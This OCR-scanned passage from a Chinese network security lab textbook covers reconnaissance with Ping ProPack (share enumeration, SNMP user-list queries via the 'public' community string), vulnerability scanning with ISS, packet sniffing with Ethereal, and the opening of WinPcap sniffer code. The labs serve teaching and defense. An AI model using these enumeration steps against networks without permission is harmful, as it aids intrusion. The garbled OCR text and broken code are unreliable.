Ping | TraceRoute | Lookup | Finger | Whois | LDAP 


Host Name or IP |222. 206. 192.2 v| List View| Help | Clear | Start 
Comte: — x Pag] — 
Size: [0 2] — Timeout 5000 =} % a 


[Ping is used to determine if a network device is reachable. 


图 11-5 Ping ProPack 目标 设置 
(4) 选择 Scan 选项 卡 ， 选 中 Scan Ports 选项 ， 检 测 熟知 的 端口 号 ， 如 图 11-6 所 示 。 
ioj xi 


File Edit Help 


Info | Time | HOWL | Ping | TraceRoute | Lookup | Finger | Whois | LDAP 
Quote Se | Wintet | Throughput | About 
Start Address: [222 poe [ee fi — Help | Crear [stet] 
End Address: Js ps Slow Network 三 
Timeout: [200 


[v Resolve Names) 


[Scan for devices in your network. 


图 11-6 扫描 设置 


(5) 选择 WinNet 选项 卡 ， 在 Network Items 列表 框 中 选择 domains， 然 后 单 击 Start 
按钮 ， 结 束 以 后 文本 框 中 将 列 出 同一 网 络 中 的 域 /工作 组 信息 ， 如 图 11-7 所 示 。 

(6) 在 Network Items 列表 框 中 选择 shares， 可 以 扫描 到 共享 信息 。 

Ping ProPack 作为 攻击 者 常用 的 扫描 工具 ， 提 供 了 常用 的 网 络 扫描 功能 。 对 于 网 络 
安全 审计 人 员 来 说 ， 它 可 以 在 图 形 界面 下 实现 大 多 数 net 命令 行程 序 功能 ， 为 网 络 的 管 
理 提供 了 一 定 的 方便 ， 对 网 络 中 的 用 户 共享 进行 检测 ， 从 而 及 时 发 现 问 题 并 加 以 防范 。 
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zix 
File Edit Help 

Info | Time | HTML | Ping | TraceRoute | Lookup | Finger | Whois | LDAP | 

Quote | Scan | Winslet | Throughput | About | 


Network Itens: [EEES = Hep | cheer [[ Step | 


]MSHOME. 
Redi iade 222.206.192. 126 


\\BILLGATES 

\\BLUEICE-DESKTOP = 222. 206. 192.243 

\\EB18395B202346B = a 206. 192. 237 
\EVER = 222. 206. 192. 31 

EVE Shar dDocs 


EYER\ 我 的 游 
Med 
WAEVER\ 我 的 音乐 


[Obtain information on the WinNet network domains, hosts and workstations. 


图 11-7 WinNet 设置 


3. 从 SNMP 中 获取 信息 

(1) 在 Ping ProPack 中 右 击 Network Neiborhood， 在 弹出 菜单 中 选择 Properties| 
Services|SNMP Service， 单 击 Properties 按钮 ， 在 弹出 的 对 话 框 中 选择 Security 选项 卡 ， 
在 Accepted Community Names 字段 中 输入 任意 字符 串 。 确 认 Accept SNMP Packets From 
Any Host Field 选项 被 选中 ， 单 击 Apply， 再 单 击 OK 按钮 。 

(2) 打开 Control PanellServices， 加 亮 选择 SNMP Services 项 ， 先 停止 再 重新 启动 
服务 。 

(3) 打开 Ping ProPack， 选 择 SNMP 选项 卡 ， 输 入 自己 的 IP 地 址 或 localhost， 如 
图 11-8 所 示 。 


Eile Edit Help 
Info | Time | HTML | Ping | TraceRoute | Lookup | Finger | Whois | LDAP 
Quote | Scan sm WinNet | Throughput | About 
Address: [222.206.192.2 z] G get _Help | Chear [Ec] 
C Get Next 
ommunity: [pub] 
z a C Get All Subiter 
What: [1-3.6.1.2.1.4.16 m 


[View Simple Network Management Protocol values. 


图 11-8 SNMP 设置 
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(4) 在 Community 文本 框 中 输入 第 三 步 输入 的 字符 串 “public”。 

(5) 选择 Get All Subitems 单 选 按钮 。 

(6) 单 击 What 字段 右边 的 辆 按钮 , 选择 Private|Enterprise|lanmanager|lanmgr-2| server| 
svUserTable， 然 后 单 击 OK 按钮 ， 或 直接 输入 “1.3.6.1.4.1.77.2.25 ”。 

(7) 单 击 Start 按钮 ， 将 能 够 收 到 NT 用 户 名 列表 信息 。 

(8) 合作 双方 交换 位 置 。 

(9) 合作 者 1: 打开 Sniffer Pro， 开 始 捕捉 数据 包 。 

(10) 合作 者 2: 使 用 Ping ProPack 查询 自己 的 配置 了 SNMP 的 主机 ，Ping ProPack 
要 求 输入 Community 名 称 ， 具 体 查询 配置 方法 与 第 3 步 和 第 4 步 相 同 。 

QD 合作 者 1: 在 捕捉 到 相应 数据 包 后 ， 单 击 工具 栏 上 的 End and View 按钮 打开 
分 析 。 

C120. 如 果 当 前 数据 包 中 没有 相应 的 信息 ， 查 看 后 续 数据 包 ， 应 该 能 够 看 到 包含 
Community 名 称 的 信息 , 之 所 以 能 够 看 到 Community 信息 , 是 由 SNMP 的 明文 传输 特性 
决定 的 。 

(13) 合作 者 2: 继续 对 对 方 的 SNMP 进行 查询 。 

(14) 合作 者 2: 选择 Get Next 单 选项 , 在 What 文本 框 中 输入 “1.3.6.1.4.1.77.1.2.3”， 
然后 单 击 Start 按钮 开始 查询 ， 随 后 将 能 够 看 到 对 方 主机 正在 运行 的 服务 。 

在 完成 这 个 实验 以 后 ， 还 可 以 设法 捕获 HTTP, FTP, DNS, POP3, SMTP 等 数据 
f, 然后 再 进行 对 比 。 本 实验 由 在 分 析 SNMP Community 名 称 的 明文 传输 特性 ， 实 际 上 
像 POP3、HTTP、SMTP、FTP、DNS、LDAP 等 使 用 的 都 是 明文 传输 方式 ， 可 见 这 一 点 
所 存在 的 巨大 的 安全 隐患 ， 综 合 所 做 过 的 实验 ， 可 以 更 进一步 掌握 IPv4 协议 层 (Telnet， 
FTP，HTTP 等 ) 的 安全 特性 。 所 以 ， 从 这 一 角度 来 说 ， 如 果 在 传输 过 程 中 不 进行 有 效 的 
加 密 和 认证 体系 ， 以 上 的 这 些 协 议 根 本 不 具备 任何 安全 性 。 


【实验 报告 】 

(1) 详细 叙述 实验 过 程 。 

(2) 利用 Ping ProPack 工具 对 一 个 网 站 进行 侦 测 ， 并 写 出 分 析 结 果 。 
【思考 题 】 

(1) 根据 Tracert 的 原理 ， 尝 试 编程 实现 这 一 程序 。 

(2) 分 析 网 络 侦 测 的 原理 ， 提 出 如 何 防止 黑客 侦 测 网 络 信息 的 方法 。 


11.2.2 ”网 络 漏洞 扫描 


【实验 目的 】 
掌握 网 络 漏洞 扫描 的 原理 和 常用 工具 。 
【原理 简介 】 


网 络 漏洞 扫描 器 是 一 种 基于 网 络 的 漏洞 扫描 和 分 析 工 具 软 件 ， 能 够 自动 检查 主机 、 
网 络 设备 的 安全 漏洞 ， 并 且 提 供 检测 报告 和 解决 方案 。 使 用 网 络 漏洞 扫描 器 ， 可 以 找 出 
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各 系统 的 漏洞 ， 并 集中 了 解 网 络 风险 所 在 ， 不 需要 每 天 在 各 个 厂商 站 点 和 安全 站 点 上 注 
意 各 操作 系统 和 设备 的 漏洞 通报 。 漏 洞 扫描 器 把 极为 烦琐 的 安全 检测 ， 通 过 程序 来 自动 
完成 ， 这 不 仅 减 轻 了 管理 者 的 工作 ， 而 且 缩短 了 检测 时 间 ， 使 问题 发 现 更 快 ， 是 网 络 安 
全 管理 和 维护 人 员 的 必 备 工具 。 

ISS 系统 扫描 器 (System Scanner) 是 基于 主机 的 一 种 领先 的 安全 评估 工具 ， 是 最 为 
强大 的 漏洞 扫描 器 之 一 。 它 是 基于 主机 的 安全 评估 策略 来 分 析 系 统 漏洞 ， 在 系统 层 上 通 
过 依附 于 主机 上 的 扫描 器 代理 侦 测 主机 内 部 的 漏洞 。 

系统 扫描 器 采用 C-S 结构 ， 由 代理 程序 和 控制 台 组 成 。 系 统 扫描 器 代理 被 安装 在 被 
检查 和 监控 的 机 器 上 ， 控 制 台 一 般 安装 在 控制 中 心 ， 控 制 台 和 代理 可 以 安装 在 同一 台 机 
器 上 或 安装 在 能 与 代理 机 器 连接 的 主机 上 。 一 旦 代理 程序 和 控制 程序 安装 完毕 ， 就 可 
以 交互 式 地 操作 系统 扫描 器 的 代理 程序 进行 系统 安全 漏洞 扫描 ， 包 括 系统 错误 配置 和 
普通 配置 信息 。 用 户 根据 扫描 结果 对 系统 漏洞 进行 修补 ， 直 到 扫描 报告 中 不 再 出 现任 
何 警告 。 

ISS 系统 扫描 器 把 快速 的 分 析 与 可 靠 的 建议 结合 起 来 ， 从 而 保护 主机 上 的 应 用 程序 、 
数据 免 受 盗用 、 破 坏 或 误 操作 。 同 时 可 以 制定 一 个 系统 基线 ， 制 定 计划 和 规则 ， 让 系统 
扫描 器 在 没有 任何 监管 的 情况 下 自动 运行 ， 一 旦 发 现 漏洞 立即 报警 。 在 内 部 环境 中 ， 它 
帮助 使 用 者 关注 容易 忽视 的 行为 ， 例 如 使 病毒 软件 丧失 能 力 ， 未 经 许可 拨打 Modem, 不 
明智 使 用 Internet 和 远程 访问 软件 等 类 似 活动 ， 造 成 防火 墙 和 其 他 企业 安全 措施 的 
失效 。 

一 旦 系统 的 安全 漏洞 得 到 识别 和 修补 ， 系 统 扫描 将 锁定 系统 配置 ， 时 刻 维护 系统 安 
全 。 这 些 扫 描 器 代理 的 安全 策略 可 以 通过 系统 扫描 器 控制 台 进行 集中 管理 和 配置 。 


【实验 环境 】 
网 络 环境 ，ISS 扫描 器 。 


【实验 步骤 】 

1. 使 用 ISS 扫描 器 

CD 单 击 【开始 】| EJF] [ISS|Internet Scanner 6.0.1. 

(2) 在 出 现 的 对 话 框 中 ， 选 中 Create a New Session 单 选项 ， 然 后 单 击 OK 按钮 ， 如 
图 11-9 所 示 。 

(3) 出 现 Key Select 对 话 框 时 ， 选 择 iss.key， 然 后 单 击 【 下 一 步 】 按 钮 。 

(4) 在 Policy Select 对 话 框 中 ， 选 择 L3 NT Server， 然 后 单 击 【下 一 步 】 按 钮 ， 如 
图 11-10 所 示 。 

(5) 在 New session wizard-Comment 对 话 框 中 ， 将 策略 命名 为 Lesson 2， 然 后 单 击 
【下 一 步 】 按 钮 。 

(6) 在 Specify Hosts 部 分 , 选择 Ping All Valid Hosts In You Key Range 单 选 项 ， 再 单 
击 【 下 一 步 】 按 钮 。 
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New Session Wizard - Policy Select E 2x! 


Select A Policy 
Choose a Policy for this session. 


B Pp P P 


Blank Evaluation isdbs 


ai 
[2n 
[AM] @ reste x ges Session 


a] C Open an Existing Session File 
€ Load a Session From Datebese 
thi] © Generate a Report 

I Don’t show this dialog again. 


Ce ew | [xem]: | wm | ww | 
FA 11-9 ISS 扫描 器 设置 图 11-10 扫描 策略 选择 


(7) 在 Set Host Ping Range 部 分 ， 查 看 所 显示 的 网 络 中 的 主机 数量 是 否 正确 ， 和 否则 
需要 通过 单 击 Edit Range 按钮 手工 编辑 。 
(8) 完成 以 上 步骤 后 ， 单 击 Finish， 出 现 ISS 主 界面 ， 如 图 11-11 所 示 。 
ax 


RA Sie Edt yew Policy Scan Reports Tools Window Help 
JOs\E\/+—- 2), i 


Hosts to be scanned 
Æ 127.0.0.1 [haiang.haian.c 


diventi ory 


B P P P 


L2 Database L3 Desktop 
Discovery dem 


classifi 


he installed file name “PluginExploits2. chm” was successfully verifica 
he installed file name “PluginExploits2. dat" was successfully verifi¢ 
paded 138 of 738 Exploits 

:\Program Files\ISS\Scanner6 has correct security B 
:\Program Files\ISS\Scanner6\tmp\ has correct security 
!\Program Files\ISS\Scanner6\pwd\ has correct security 


图 11-11 扫描 结果 


(9) Internet Scanner 将 ping 网 络 中 的 所 有 主机 以 检查 连通 性 ， 随 后 将 显示 可 到 达 的 
主机 列表 。 

C10) 如 果 有 遗漏 的 主机 ， 可 以 使 用 菜单 Edit|Add Host 手工 添加 。 

QD 加 亮 显 示 需 要 检测 的 主机 的 也 地址 。 

(12) 打开 Scan 菜单 ， 然 后 单 击 Scan Now。 

(13) 检测 完成 后 ， 加 亮 显示 该 主机 ， 然 后 单 击 Hosts To Be Scanned 底部 的 
Vulnerabilities 标签 

(14) 展开 Vulnerabilities 树 结 构 ， 注 意 观 察 节点 列表 。 
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展开 后 ， 应 该 能 够 看 到 类 似 图 11-12 中 的 树 状 列表 ， 其 中 列 出 了 存在 的 安全 问题 。 
C15) 选择 第 一 项 ， 加 亮 该 主机 的 IP 地 址 与 它 存在 的 弱点 ， 如 图 11-12 所 示 。 


k% ISS Internet Scanner - [Session1] —— lox 


Ele Edt View Policy Scan Reports Tools Window Help 二 | 可 | xi 
JOs B+- SA Sa 
[Host [vulnerability Name | 


Network Guest Logon Everyone 
Domain User No Pwd Guest 
Domain User No Pwd IWAM, Hà 


e 
e 
© Domain User No Pwd IUSR_HAT 
eo Domain User No Pwd TsInterne 
A 
m - 
» 


© Domain User No Pwd IwAI 


s € m— | 


e installed file name “PluginExploits2. chm” was successfully verifica] 
he installed file name "PluginExploits2, dat" was successfully verific 
aded 739 of 739 Exploits. 

:\Program Files\ISS\Scanner6 has correct security 


图 11-12 ”漏洞 列表 


(16) 找 出 适合 右 侧 窗 格 的 节点 项 ， 右 击 该 节点 ， 在 弹出 的 菜单 中 选择 What's This, 
观察 详细 信息 以 及 处 理 建 议 ， 如 图 11-13 所 示 。 
;-inixi 
sa na f 


Autologon password readable 


Risk Level: @ High Check or Attack Name: Autologon passwort 


Platforms: Windows NT 

Description: The autologon password is readable by non-Administrators 
Windows NT 4.0 Service Pack has not been applied, attacke 
autologon password and freely access the system, 

Remedy: Disable autologon, protect the Winlogon registry key, and a 
Windows NT 4.0 Service Pack. 


If autologon is not being used, disable autologon. 


WARNING: Incorrectly using Registry Editor may cause seve 
irreparable damage and may require vou tọ reinstall vour opt 
上 


图 11-13 ”漏洞 信息 


以 上 列 出 的 是 密码 永 不 过 期 的 安全 漏洞 ， 在 实际 实验 当中 ， 得 出 的 结果 可 能 并 不 是 
这 样 ， 但 不 管 检 测 出 了 什么 问题 ，ISS 都 有 类 似 的 详细 的 分 析 报 告 。 

2. 查看 1SS 检测 报告 

(1) 打开 ISS Internet Scanner. 

(2) 创建 一 个 新 会 话 ， 命 名 为 lab。 

(3) 选择 一 台 主机 ， 然 后 在 Scan 菜单 中 选择 Scan Now 进行 扫描 检测 。 

(4) 打开 Reports 菜单 ， 选 择 Generate Report. 

(5) 单 击 Technician 图 标 ， 展 开 后 查看 Vulnerabilities 项 ， 如 图 11-14 所 示 。 
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Generate Reports - Report Selection 


e 
E 

E 

Op 

S 

v 

国 

Ve ent Sorted by DNS Name 
D v ted by IP Address 


©] Technician 
© User Imported 


图 11-14 系统 漏洞 报告 


E 


(6) 选择 Vulnerability Assessment Sorted by IP Address， 然 后 单 击 【 下 一 步 】 按 钮 ， 


如 图 11-15 所 示 。 


Generate Reports - Report Criteria 


[ Select all the sessions that you want to include in the report. 


Jobs (Scan Sessions) 


图 11-15 ”漏洞 选择 


CD 选择 前 面 所 定义 的 会 话 ， 单 击 【下 一 步 】 按 钮 ， 在 这 一 步 ， 还 可 以 有 针对 性 地 


选择 相应 的 风险 级 别 。 


(8) 单 击 Preview Report 按钮 ，ISS 将 产生 详细 的 检测 报告 ， 在 这 一 步 还 可 以 选择 打 
印 报告 (Print Report) 或 导出 报告 CExport Report)， 可 以 根据 需要 做 出 不 同 的 选择 。 

(9) 查阅 ISS 所 产生 的 检测 报告 。ISS 所 创建 的 检测 日 志 中 列 出 一 些 潜在 的 安全 威 
胁 和 系统 漏洞 ， 可 以 针对 Intranet、Firewall、Web Server， 并 且 对 每 一 种 活动 都 提供 了 可 
自 定 义 的 扫描 方案 ， 所 产生 的 扫描 报告 中 包含 重要 的 和 经 常 受 攻击 的 系统 的 安全 特性 。 


【实验 报告 】 
(1) 详细 叙述 使 用 ISS 扫描 器 的 实验 步 又。 
(2) 分 析 扫 描 结 果 。 


【思考 题 】 


分 析 漏 洞 扫描 器 的 工作 原理 ， 尝 试 实现 针对 Web 服务 器 中 程序 漏洞 的 扫描 器 。 
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421 _ 网络 监 听 


网 络 监听 是 一 种 常用 的 被 动 式 网 络 攻击 方法 ， 能 帮助 入 侵 者 轻易 获得 用 其 他 方法 很 
难 获得 的 信息 ， 包 括 用 户口 令 、 账 号 、 敏 感 数 据 、IP 地 址 、 路 由 信息 、TCP 套 接 字号 等 。 
管理 员 使 用 网 络 监听 工具 可 以 监视 网 络 的 状态 、 数 据 流动 情况 以 及 网 络 上 传输 的 信息 。 


12.1.1 使 用 Sniffer 捕获 数据 包 


【实验 目的 】 
掌握 Sniffer 捕获 数据 包 的 技术 , 了 解 一 般 局 域 网 内 的 监听 手段 , 掌握 如 何 防范 攻击 。 
【原理 简介 】 


嗅 探 器 (Sniffer) 是 利用 计算 机 的 网 络 接口 截获 目的 地 为 其 他 计算 机 的 数据 报 文 的 
一 种 技术 。 它 工作 在 网 络 的 底层 ， 把 网 络 传输 的 全 部 数据 记录 下 来 。 嗅 探 器 可 以 帮助 网 
络 管理 员 查 找 网 络 漏洞 和 检测 网 络 性 能 。 嗅 探 器 可 以 分 析 网 络 的 流量 ， 以 便 找 出 所 关心 
的 网 络 中 潜在 的 问题 。 

不 同 传输 介质 网 络 的 可 监听 性 是 不 同 的 。 一 般 来 说 ,以 太 网 被 监听 的 可 能 性 比较 高 ， 
因为 以 太 网 是 一 个 广播 型 的 网 络 ， 微 波 和 无 线 网 被 监听 的 可 能 性 同样 比较 高 ， 因 为 无 线 
电 本 身 是 一 个 广播 型 的 传输 媒介 ， 弥 散在 空中 的 无 线 电信 号 可 以 被 很 轻易 地 截获 。 

在 以 太 网 中 ， 嗅 探 器 通过 将 以 太 网 卡 设置 成 混杂 模式 来 捕获 数据 。 因 为 以 太 网 协议 
的 工作 方式 是 将 要 发 送 的 数据 包 发 往 连 接 在 一 起 的 所 有 主机 ， 包 中 包含 着 应 该 接收 数据 
包 主 机 的 正确 地 址 ， 只 有 与 数据 包 中 目标 地 址 一 致 的 那 台 主机 才能 接收 。 但 是 ， 当 主机 
工作 在 监听 模式 下 ， 无 论 数据 包 中 的 目标 地 址 是 什么 ， 主 机 都 将 接收 (当然 只 能 监听 经 
过 自己 网 络 接 口 的 那些 包 )。 

在 因特网 上 有 很 多 使 用 以 太 网 协议 的 局 域 网 , 许多 主机 通过 电缆 、 集 线 器 连 在 一 起 。 
当 同 一 网 络 中 的 两 台 主 机 通信 的 时 候 ， 源 主机 将 写 有 目的 主机 地 址 的 数据 包 直 接 发 向 目 
的 主机 。 但 这 种 数据 包 不 能 在 IP 层 直 接 发 送 , 必须 从 TCP/IP 协议 的 IP 层 交 给 网 络 接口 ， 
也 就 是 数据 链 路 层 ， 而 网 络 接口 是 不 会 识别 IP 地 址 的 , 因此 在 网 络 接口 数据 包 又 增加 了 
一 部 分 以 太 帧 头 的 信息 。 在 帧 头 中 有 两 个 域 ， 分 别 为 只 有 网 络 接口 才能 识别 的 源 主机 和 
目的 主机 的 物理 地 址 ， 这 是 一 个 与 IP 地 址 相对 应 的 48b 的 以 太 地 址 。 

传输 数据 时 ， 包 含 物理 地 址 的 帧 从 网 络 接口 〈 网 卡 ) 发 送 到 物理 的 线路 上 ， 如 果 局 
域 网 是 由 一 条 粗 缆 或 细 缆 连接 而 成 ， 则 数字 信号 在 电缆 上 传输 ， 能 够 到 达 线 路 上 的 每 一 
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台 主机 。 当 使 用 集线器 时 ， 由 集线器 再 发 向 连接 在 集线器 上 的 每 一 条 线路 ， 数 字 信号 也 
到 达 连 接 在 集线器 上 的 每 一 台 主 机 。 当 数字 信号 到 达 一 台 主 机 的 网 络 接口 时 ， 正 常情 
况 下 ， 网 络 接口 读 入 数据 帧 ， 进 行 检查 ， 如 果 数 据 帧 中 携带 的 物理 地 址 是 自己 的 或 者 是 
广播 地 址 ， 则 将 数据 帧 交 给 上 层 协议 软件 ， 也 就 是 IP 层 软 件 ， 否 则 就 将 这 个 帧 丢弃 。 对 
于 每 一 个 到 达 网 络 接口 的 数据 帧 ， 都 要 进行 这 个 过 程 。 

然而 ， 当 主机 工作 在 监听 模式 下 ， 所 有 的 数据 帧 都 将 被 交 给 上 层 协 议 软件 处 理 。 而 
且 ， 当 连接 在 同一 条 电缆 或 集线器 上 的 主机 被 逻辑 地 分 为 几 个 子 网 时 ， 如 果 一 台 主 机 处 
于 监听 模式 下 ， 它 还 能 接收 到 发 向 与 自己 不 在 同一 子 网 (使 用 了 不 同 的 掩 码 、IP 地 址 和 
网 关 ) 的 主机 的 数据 包 。 也 就 是 说 ， 在 同一 条 物理 信道 上 传输 的 所 有 信息 都 可 以 被 接收 
到 。 另 外 ， 现 在 网 络 中 使 用 的 大 部 分 协议 都 是 很 早 设计 的 ， 许 多 协议 的 实现 都 是 基于 一 
种 非常 友好 的 、 通 信 的 双方 充分 信任 的 基础 之 上 ， 许 多 信息 以 明文 发 送 。 因 此 ， 如 果 用 
户 的 账户 名 和 口令 等 信息 也 以 明文 的 方式 在 网 上 传输 ， 而 此 时 一 个 黑客 或 网 络 攻击 者 正 
在 进行 网 络 监听 , 只 要 具有 初步 的 网 络 和 TCP/IP 协议 知识 , 便 能 轻易 地 从 监听 到 的 信息 
中 提取 出 感 兴趣 的 部 分 。 同 理 ， 正 确 地 使 用 网 络 监听 技术 也 可 以 发 现 入 侵 并 对 入 侵 者 进 
行 追 踪 定 位 ， 在 对 网 络 犯罪 进行 侦查 取证 时 获取 有 关 犯 罪行 为 的 重要 信息 ， 成 为 打击 网 
络 犯罪 的 有 力 手段 。 


【实验 环境 】 
网 内 设 有 三 台 主 机 ，IP 地 址 分 别 为 192.168.0.61、192.168.0.101、192.168.0.92， 其 


Sgi 


中 192.168.0.92 主机 中 安装 Sniffer 软件 Ethereal, 7E EHL 192.168.0.101 上 运行 FTP 服务 


器 ， 如 图 12-1 所 示 。 
口 m 


192.168.0.61 192.168.0.101 


192.168.0.92 
图 12-1 实验 环境 


【实验 步骤 】 

(1) 单 击 Ethereal 图 标 ， 激 活 Ethereal 工具 。 

(2) 在 主 界面 中 ， 单 击 最 下 边 一 排 的 Filter 按钮 ， 打 开 过 滤器 的 设置 界面 ， 这 里 可 
以 根据 需要 选取 或 直接 输入 过 滤 命 令 ， 并 支持 and/or 的 功能 连接 。 这 里 输入 “tcp and 
ip.addr 一 192.168.1.61”， 单 击 OK 按钮 配置 结束 ， 如 图 12-2 所 示 。 

(3) 单 击 菜单 栏 中 的 CapturelInterface， 查 看 可 以 进行 监听 的 网 络 接口 〈 这 里 可 以 直 
接 单 击 右 侧 的 Capture 按钮 进行 数据 包 的 捕获 )， 如 图 12-3 所 示 。 

(4) 单 击 图 12-3 中 需要 监听 接口 的 Prepare 按钮 ， 可 以 进行 监听 接口 的 选择 和 设 定 ， 
如 图 12-4 所 示 〈 这 里 单 击 Start 按钮 即 可 在 Interface 栏 选 定 的 接口 上 进行 嗅 探 、 监 听 )。 
然后 单 击 Cancel 回 到 Interface 界面 。 
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Ethereal: Display Filter 


IP only 

IP address 192.168.0.1 

IP address isnt 192.168.0.1, dont use for this! 
IPX only 

TCP only 

UDP only 


Properties 
Filter name: TCP only 


Filter string: tcp and ip.addr==192.168.0.61| [Expression..] 
Help o«  J[ mv Save jJ[ cese 
图 12-2 ”过 滤器 设置 


@ Ethereal: Capture Interfaces DOR) 

Description IP. Packets Packetsis 
Generic dialup adapter 107 65 Capture] Prepare | | Details 
VMware Virtual Ethemet Adapter 192.168.74.1 [Capture] Prepare | | Details 
WAN (PPP/SLIP) Interface 221.3.124.117 107 65 Capture] Prepare | | Details 
VMware Virtual Ethernet Adapter 192.168.232.1 Capture | Prepare | | Details 
Intel(R) PRO/1000 MT Mobile Con 222.195.151.217 [Capture] [Prepare] [Details } 
Intel(R) PRO/Wireless LAN 21002 192.168.0.2 Capture] Prepare | | Details 
VMware Virtual Ethernet Adapter 192.168.180.1 Capture] Prepare | | Details 

Y 


图 12-3 选择 监听 端口 


@ Ethereal: Capture Options 
Capture 
Interface: | Generic dialup adapter: \Device\NPF_GenericDialupAdapter 


IP address: unknown 
Buffer size: 1 > megabyte(s) 
Capture packets in promiscuous mode 


Limit each packetto bytes 


Capture Filter] | nottep port 3389 [-] 


Capture File(s) Display Options 
File 


C Update list of packets in real time 


口 use multiple files 


Hide capture info dialog 


ime Resolution 


Stop Capture . Enable MAC name resolution 


BH ater Enable network name resolution 


Enable transport name resolution 


ancel 
图 12-4 ”编辑 监听 选项 
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(5) 在 Interface 界面 中 单 击 需要 监听 接口 的 Capture 按钮 即 进入 网 络 嗅 探 状态 ， 如 
图 12-5 所 示 。 一 
(6) 当 有 需要 的 数据 包 出 现 或 监听 一 段 时 间 后 ，。 站 se Conture tron ce [= EER) 


Captured Packets: 


单 击 Stop 按钮 ， 结 束 监 听 并 自动 进入 协议 分 析 界 面 。 % oftotal 
E =z 

【实验 报告 】 

(1) 详细 描述 实验 过 程 。 

(2) 仔细 查看 截获 的 数据 , 分析 通 过 嗅 探 器 能 够 
获取 哪些 信息 。 

【思考 题 】 

根据 嗅 探 器 工作 原理 ， 分 析 如 何 抵御 嗅 探 器 
攻击 。 


12.1.2 ”了 嗅 探 器 的 实现 图 12-5 监听 状态 
【实验 目的 】 

掌握 基于 Libpcap/WinPcap 的 协议 分 析 器 的 设计 方法 。 

【原理 简介 】 


嗅 探 器 程序 一 般 包 括 内 核 部 分 和 用 户 分 析 部 分 。 其 中 内 核 部 分 负责 从 网 络 中 捕获 和 
过 滤 数 据 。 用 户 分 析 部 分 负责 界面 、 数 据 转 化 与 处 理 、 格 式 化 、 协 议 分 析 ， 如 果 在 内 核 
没有 过 滤 数 据 包 ， 在 这 里 还 要 对 数据 进行 过 滤 。 一 个 较为 完整 的 基于 网 络 监听 和 过 滤 的 
程序 一 般 包 括 以 下 步骤 : 数据 包 捕 获 、 数 据 包 过 滤 与 分 解 、 数 据 分 析 。 

数据 包 捕获 常用 的 方法 有 以 下 两 种 。 

(1) 通过 设置 硬 路 由 器 的 监听 端口 。 

(2) 利用 以 太 网 络 的 广播 特性 。 这 种 方式 必须 将 网 卡 设置 为 混杂 Cpromiscuous) 模 
式 。 监听 程序 工作 在 网 络 环境 的 底 三 层 , 可 以 拦截 所 有 经 过 该 机 器 的 网 络 上 传送 的 数据 ， 
然后 将 这 些 数据 做 相应 处 理 ， 可 以 实时 分 析 这 些 数据 的 内 容 ， 进 而 分 析 网 络 当前 状态 和 
整体 布局 。 基 于 Windows 的 数据 包 捕 获 方案 有 以 下 几 种 。 

e 使 用 原始 套 接 字 (Row Socket) 机 制 。 方 法 简单 ， 但 功能 有 限 ， 只 能 捕获 较 高 层 


的 数据 包 。 
。 直接 连接 调用 NDIS 库 函 数 ， 这 种 方法 功能 非常 强大 ， 但 是 比较 危险 ， 很 可 能 
BRB TA EE EK o 


e 使 用 或 者 自行 编写 中 间 层 驱动 程序 ,这 是 微软 公司 推荐 使 用 的 一 种 方法 ,微软 提 
供 的 Windows 2000 DDK 中 也 提供 了 儿 个 这 样 的 驱动 程序 。 在 具体 的 实现 方式 上 
可 分 为 用 户 级 和 内 核 级 两 类 。 其 中 内 核 级 主要 是 TDI. 捕获 过 滤 驱 动 程序 ，NDIS 
中 间 层 捕获 过 滤 驱 动 程序 ，NDIS 捕获 过 滤 钧 子 驱 动 程序 等 ， 它 们 都 是 利用 网 络 
驱动 来 实现 的 ， 而 用 户 级 的 包括 SPL Windows 2000 包 捕 获 过 滤 接 口 等 。 

e 使 用 或 自行 编写 协议 驱动 程序 。 
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e 使 用 第 三 方 捕获 组 件 或 者 库 ， 比 如 WinPcap。 

捕获 数据 包 后 要 进行 的 工作 是 对 其 进行 包 过 滤 与 分 解 ， 就 是 在 海量 的 数据 里 面 找 感 
兴趣 的 内 容 。 一 些 基 础 的 过 滤 规 则 如 下 。 

e 站 过 滤 : 专门 筛选 出 来 自 一 台 主 机 或 者 服务 器 的 数据 。 

e 协议 过 滤 : 根据 不 同 的 协议 来 筛选 数据 ， 例 如 ， 选 择 TCP 数据 而 非 UDP 数据 。 

e 服务 过 滤 : 根据 端口 号 来 选择 特定 数据 包 。 

e 通用 过 滤 : 通过 数据 包 中 某 一 特定 位 置 开 始 ， 选 择 具有 某 些 共同 数据 特征 的 数 

据 包 。 

过 滤 完 成 后 ， 必 须 进 行 数 据 分 析 , 这 一 部 分 就 是 对 已 经 捕获 的 数据 包 进行 各 种 分 析 ， 
比如 网 络 流量 分 析 、 数 据 包 中 信息 分 析 、 敏 感 信息 提取 分 析 等 ， 其 功能 取决 于 系统 要 达 
到 的 目的 。 

WinPcap 是 Windows 平台 下 一 个 专业 网 络 数据 包 捕获 开发 包 ， 是 为 Libpcap 在 
Windows 平台 下 实现 数据 包 的 捕获 而 设计 的 。Libpcap (WinPcap 是 其 Windows 版 本 ) 可 
以 提供 与 平台 无 关 的 接口 ， 而 且 操作 简单 ， 它 是 基于 BPF (Berkeley Packet Filter) 经 改 
进而 来 的 。 该 软件 来 自 Berkeley 的 Lawrence National Laboratory 研究 院 。 

基于 Libpcap/WinPcap 库 的 基本 使 用 流程 比较 规范 ， 一 般 为 : 

(1) 使 用 pcap_lookupdev 获取 设备 。 

(2) 使 用 pcap_lookupnet 获取 网 络 地 址 和 子 网 掩 码 。 

(3) 使 用 pcap_open_live 打开 设备 。 

(4) 使 用 pcap_compile 编译 过 滤 规 则 。 

(5) 使 用 peap_setfilter 设置 过 滤 规 则 。 

(6) 使 用 pcap loop 循环 捕获 数据 包 ， 在 其 中 调用 相应 处 理 函数 。 

(7) 使 用 pcap_close 关闭 设备 句柄 。 

【实验 环境 】 

Windows 2000 以 上 版 本 ，WinPcap 3.0。 


【实验 步骤 】 
参考 以 下 代码 编写 基于 WinPcap 的 监听 程序 。 


http: //www.WinPcap.org/docs/docs31/html/group__wpcap__tut.html 
/* 
* Copyright (c) 1999—2002 
* Politecnico di Torino. All rights reserved. 
* 
ud 
finclude "stdafx.h" 
#include "pcap.h" 
/* 4 bytes IP address */ 
typedefstruct ip address( 
u char bytel; u char byte2; u char byte3; u char byte4; 
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Jip address; 
/* IPv4 header */ 
typedefstruct ip header( 


u char ver ihl; // Version (4 bits) + Internet header length 
(4 bits) 

u char tos; // Type of service 

u short tlen; // Total length 

u short identification; // Identification 

u short flags fo; // Flags (3 bits) * Fragment offset (13 bits) 

u char ttl; // Time to live 

u char proto; // Protocol 

u short crc; // Header checksum 

ip address saddr; // Source address 

